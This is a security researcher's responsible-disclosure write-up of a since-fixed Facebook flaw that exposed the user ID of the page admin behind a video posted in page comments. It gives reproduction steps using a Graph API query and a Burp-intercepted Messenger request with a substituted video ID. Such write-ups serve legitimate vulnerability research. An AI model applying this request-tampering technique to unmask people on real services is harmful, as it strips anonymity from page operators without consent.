Reveal the page admin that uploaded a video on the page in comment section

This post is about an bug that I found on Facebook which used to disclose the page role person’s User ID when posted a video on comment section of the page.

Recently I read a page admin disclosure writeup that was found by Kassem Bazzoun in https://bugreader.com/kbazzoun@221 .That bug Reveal the page admin that uploaded a video on the page feeds and After reading the Write Up then I decided to try if I can bypass the Fix with different scenarios.

The Question Raised in my mind that how Facebook server will validate the Video ID if it is in Different section in pages.

Example:

  1. Video in Page Cover Pic
  2. Video in Page Conversation
  3. Video in Comment Section on page feeds

The 3rd example disclosed the page admins User ID in response. with same reproduction steps in Kassem Bazzoun Write Up .

Reproduction Steps:

  1. Find if any video was uploaded in comments section of page post. that was uploaded as page.
Image for post
Image for post

2. Then the attacker need to get the Video ID of the video in comments by using Facebook Api.

Endpoint: https://graph.facebook.com/v5.0/PAGEID_POSTID?fields=comments{attachment}&access_token=XXXX

Image for post
Image for post

3. After getting the Video ID open the https://messenger.com and click any images that was send between the conversation and then click “Info” button. Before Clicking the info button make sure Burp Suite Intercept is on.

Image for post
Image for post

4. Intercept the request and replace the node(xxxxxxx) Base64 value into the Video ID in the comment section

Image for post
Image for post

5. After forwarding the the request the response disclose the creator User ID of the page role person that who uploaded the video.

Image for post
Image for post

Timeline:

22-Sep-2020: Report Sent

22-Sep-2020 : Further investigation by Facebook

08-Oct-2020: Fixed confirmed by Facebook and me

10-Oct-2020: $4500 bounty + $338 bonus awarded by Facebook

Image for post
Image for post

This bug was reported on BountyCon2020 event submission and Thank you Facebook Team for quickly addressing and fixing this issue.

Apart from this bug also found another 2 bugs during event submission .

  1. Delete any Photos in Facebook.
  2. Stealing CSRF token using Click Jacking Attack.

Will make this remaining writeup soon..

Written by

Web Security Researcher

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store